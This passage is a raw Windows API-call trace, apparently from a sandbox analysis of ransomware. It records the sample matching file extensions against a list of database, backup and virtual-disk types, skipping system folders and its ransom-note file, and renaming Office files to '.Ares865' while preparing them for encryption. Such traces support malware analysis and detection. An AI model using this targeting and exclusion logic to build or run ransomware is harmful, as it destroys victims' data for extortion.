lstrlenW (lpString="fol") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.285] lstrlenW (lpString="fp3") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.285] lstrlenW (lpString="fp4") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.285] lstrlenW (lpString="fp5") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.285] lstrlenW (lpString="fp7") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.285] lstrlenW (lpString="fpt") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.285] lstrlenW (lpString="frm") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.285] lstrlenW (lpString="gdb") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.285] lstrlenW (lpString="gdb") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.285] lstrlenW (lpString="grdb") returned 4 [0086.285] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.285] lstrlenW (lpString="gwi") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.285] lstrlenW (lpString="hdb") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.285] lstrlenW (lpString="his") returned 3 [0086.285] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.285] lstrlenW (lpString="ib") returned 2 [0086.285] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.286] lstrlenW (lpString="idb") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.286] lstrlenW (lpString="ihx") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.286] lstrlenW (lpString="itdb") returned 4 [0086.286] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.286] lstrlenW (lpString="itw") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.286] lstrlenW (lpString="jet") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.286] lstrlenW (lpString="jtx") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.286] lstrlenW (lpString="kdb") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.286] lstrlenW (lpString="kexi") returned 4 [0086.286] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.286] lstrlenW (lpString="kexic") returned 5 [0086.286] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.286] lstrlenW (lpString="kexis") returned 5 [0086.286] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.286] lstrlenW (lpString="lgc") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.286] lstrlenW (lpString="lwx") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.286] lstrlenW (lpString="maf") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.286] lstrlenW (lpString="maq") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.286] lstrlenW (lpString="mar") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.286] lstrlenW (lpString="marshal") returned 7 [0086.286] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.286] lstrlenW (lpString="mas") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.286] lstrlenW (lpString="mav") returned 3 [0086.286] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.286] lstrlenW (lpString="maw") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.287] lstrlenW (lpString="mdbhtml") returned 7 [0086.287] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.287] lstrlenW (lpString="mdn") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.287] lstrlenW (lpString="mdt") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.287] lstrlenW (lpString="mfd") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.287] lstrlenW (lpString="mpd") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.287] lstrlenW (lpString="mrg") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.287] lstrlenW (lpString="mud") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.287] lstrlenW (lpString="mwb") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.287] lstrlenW (lpString="myd") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.287] lstrlenW (lpString="ndf") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.287] lstrlenW (lpString="nnt") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.287] lstrlenW (lpString="nrmlib") returned 6 [0086.287] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.287] lstrlenW (lpString="ns2") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.287] lstrlenW (lpString="ns3") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.287] lstrlenW (lpString="ns4") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.287] lstrlenW (lpString="nsf") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.287] lstrlenW (lpString="nv") returned 2 [0086.287] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.287] lstrlenW (lpString="nv2") returned 3 [0086.287] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.287] lstrlenW (lpString="nwdb") returned 4 [0086.288] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.288] lstrlenW (lpString="nyf") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.288] lstrlenW (lpString="odb") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.288] lstrlenW (lpString="odb") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.288] lstrlenW (lpString="oqy") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.288] lstrlenW (lpString="ora") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.288] lstrlenW (lpString="orx") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.288] lstrlenW (lpString="owc") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.288] lstrlenW (lpString="p96") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.288] lstrlenW (lpString="p97") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.288] lstrlenW (lpString="pan") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.288] lstrlenW (lpString="pdb") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.288] lstrlenW (lpString="pdm") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.288] lstrlenW (lpString="pnz") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.288] lstrlenW (lpString="qry") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.288] lstrlenW (lpString="qvd") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.288] lstrlenW (lpString="rbf") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.288] lstrlenW (lpString="rctd") returned 4 [0086.288] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.288] lstrlenW (lpString="rod") returned 3 [0086.288] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.288] lstrlenW (lpString="rodx") returned 4 [0086.289] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.289] lstrlenW (lpString="rpd") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.289] lstrlenW (lpString="rsd") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.289] lstrlenW (lpString="sas7bdat") returned 8 [0086.289] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.289] lstrlenW (lpString="sbf") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.289] lstrlenW (lpString="scx") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.289] lstrlenW (lpString="sdb") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.289] lstrlenW (lpString="sdc") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.289] lstrlenW (lpString="sdf") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.289] lstrlenW (lpString="sis") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.289] lstrlenW (lpString="spq") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.289] lstrlenW (lpString="te") returned 2 [0086.289] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.289] lstrlenW (lpString="teacher") returned 7 [0086.289] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.289] lstrlenW (lpString="tmd") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.289] lstrlenW (lpString="tps") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.289] lstrlenW (lpString="trc") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.289] lstrlenW (lpString="trc") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.289] lstrlenW (lpString="trm") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.289] lstrlenW (lpString="udb") returned 3 [0086.289] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.289] lstrlenW (lpString="udl") returned 3 [0086.290] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.290] lstrlenW (lpString="usr") returned 3 [0086.290] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.290] lstrlenW (lpString="v12") returned 3 [0086.290] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.290] lstrlenW (lpString="vis") returned 3 [0086.290] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.290] lstrlenW (lpString="vpd") returned 3 [0086.290] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.290] lstrlenW (lpString="vvv") returned 3 [0086.290] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.290] lstrlenW (lpString="wdb") returned 3 [0086.290] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.290] lstrlenW (lpString="wmdb") returned 4 [0086.290] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.290] lstrlenW (lpString="wrk") returned 3 [0086.290] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.290] lstrlenW (lpString="xdb") returned 3 [0086.290] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.290] lstrlenW (lpString="xld") returned 3 [0086.290] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.290] lstrlenW (lpString="xmlff") returned 5 [0086.290] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.290] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.Ares865") returned 79 [0086.290] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.291] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.291] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=252256) returned 1 [0086.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.292] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.292] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.292] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.292] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.292] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.292] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3dc60, lpName=0x0) returned 0x15c [0086.294] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3dc60) returned 0x420000 [0086.306] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.307] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.307] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0086.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0086.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.307] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0086.310] CloseHandle (hObject=0x15c) returned 1 [0086.310] CloseHandle (hObject=0x118) returned 1 [0086.310] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.310] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.310] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.311] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x35960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OUTLLIBR.DLL.trx_dll", cAlternateFileName="OUTLLI~1.TRX")) returned 1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2=".") returned 1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="..") returned 1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="windows") returned -1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="bootmgr") returned 1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="temp") returned -1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="boot") returned 1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="ids.txt") returned 1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="perflogs") returned -1 [0086.311] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="MSBuild") returned 1 [0086.311] lstrlenW (lpString="OUTLLIBR.DLL.trx_dll") returned 20 [0086.312] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll") returned 71 [0086.312] lstrcpyW (in: lpString1=0x2cce468, lpString2="OUTLLIBR.DLL.trx_dll" | out: lpString1="OUTLLIBR.DLL.trx_dll") returned="OUTLLIBR.DLL.trx_dll" [0086.312] lstrlenW (lpString="OUTLLIBR.DLL.trx_dll") returned 20 [0086.312] lstrlenW (lpString="Ares865") returned 7 [0086.312] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.312] lstrlenW (lpString=".dll") returned 4 [0086.312] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2=".dll") returned 1 [0086.312] lstrlenW (lpString=".lnk") returned 4 [0086.312] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2=".lnk") returned 1 [0086.312] lstrlenW (lpString=".ini") returned 4 [0086.312] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2=".ini") returned 1 [0086.312] lstrlenW (lpString=".sys") returned 4 [0086.312] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2=".sys") returned 1 [0086.312] lstrlenW (lpString="OUTLLIBR.DLL.trx_dll") returned 20 [0086.312] lstrlenW (lpString="bak") returned 3 [0086.312] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.312] lstrlenW (lpString="ba_") returned 3 [0086.312] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.312] lstrlenW (lpString="dbb") returned 3 [0086.312] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.312] lstrlenW (lpString="vmdk") returned 4 [0086.312] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.312] lstrlenW (lpString="rar") returned 3 [0086.312] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.312] lstrlenW (lpString="zip") returned 3 [0086.312] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.312] lstrlenW (lpString="tgz") returned 3 [0086.312] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.312] lstrlenW (lpString="vbox") returned 4 [0086.312] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.312] lstrlenW (lpString="vdi") returned 3 [0086.312] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.312] lstrlenW (lpString="vhd") returned 3 [0086.312] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.312] lstrlenW (lpString="vhdx") returned 4 [0086.312] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.312] lstrlenW (lpString="avhd") returned 4 [0086.312] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.313] lstrlenW (lpString="db") returned 2 [0086.313] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.313] lstrlenW (lpString="db2") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.313] lstrlenW (lpString="db3") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.313] lstrlenW (lpString="dbf") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.313] lstrlenW (lpString="mdf") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.313] lstrlenW (lpString="mdb") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.313] lstrlenW (lpString="sql") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.313] lstrlenW (lpString="sqlite") returned 6 [0086.313] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.313] lstrlenW (lpString="sqlite3") returned 7 [0086.313] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.313] lstrlenW (lpString="sqlitedb") returned 8 [0086.313] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.313] lstrlenW (lpString="xml") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.313] lstrlenW (lpString="$er") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.313] lstrlenW (lpString="4dd") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.313] lstrlenW (lpString="4dl") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.313] lstrlenW (lpString="^^^") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.313] lstrlenW (lpString="abs") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.313] lstrlenW (lpString="abx") returned 3 [0086.313] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.313] lstrlenW (lpString="accdb") returned 5 [0086.313] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.313] lstrlenW (lpString="accdc") returned 5 [0086.313] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.314] lstrlenW (lpString="accde") returned 5 [0086.314] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.314] lstrlenW (lpString="accdr") returned 5 [0086.314] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.314] lstrlenW (lpString="accdt") returned 5 [0086.314] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.314] lstrlenW (lpString="accdw") returned 5 [0086.314] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.314] lstrlenW (lpString="accft") returned 5 [0086.314] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.314] lstrlenW (lpString="adb") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.314] lstrlenW (lpString="adb") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.314] lstrlenW (lpString="ade") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.314] lstrlenW (lpString="adf") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.314] lstrlenW (lpString="adn") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.314] lstrlenW (lpString="adp") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.314] lstrlenW (lpString="alf") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.314] lstrlenW (lpString="ask") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.314] lstrlenW (lpString="btr") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.314] lstrlenW (lpString="cat") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.314] lstrlenW (lpString="cdb") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.314] lstrlenW (lpString="ckp") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.314] lstrlenW (lpString="cma") returned 3 [0086.314] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.314] lstrlenW (lpString="cpd") returned 3 [0086.315] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.315] lstrlenW (lpString="dacpac") returned 6 [0086.315] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.315] lstrlenW (lpString="dad") returned 3 [0086.315] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.315] lstrlenW (lpString="dadiagrams") returned 10 [0086.315] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0086.315] lstrlenW (lpString="daschema") returned 8 [0086.315] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.315] lstrlenW (lpString="db-journal") returned 10 [0086.315] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0086.315] lstrlenW (lpString="db-shm") returned 6 [0086.315] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.315] lstrlenW (lpString="db-wal") returned 6 [0086.315] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.315] lstrlenW (lpString="dbc") returned 3 [0086.315] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.315] lstrlenW (lpString="dbs") returned 3 [0086.315] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.315] lstrlenW (lpString="dbt") returned 3 [0086.315] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.315] lstrlenW (lpString="dbv") returned 3 [0086.315] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.315] lstrlenW (lpString="dbx") returned 3 [0086.315] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.315] lstrlenW (lpString="dcb") returned 3 [0086.315] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.315] lstrlenW (lpString="dct") returned 3 [0086.315] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.315] lstrlenW (lpString="dcx") returned 3 [0086.315] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.315] lstrlenW (lpString="ddl") returned 3 [0086.315] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.315] lstrlenW (lpString="dlis") returned 4 [0086.315] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.315] lstrlenW (lpString="dp1") returned 3 [0086.315] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.316] lstrlenW (lpString="dqy") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.316] lstrlenW (lpString="dsk") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.316] lstrlenW (lpString="dsn") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.316] lstrlenW (lpString="dtsx") returned 4 [0086.316] 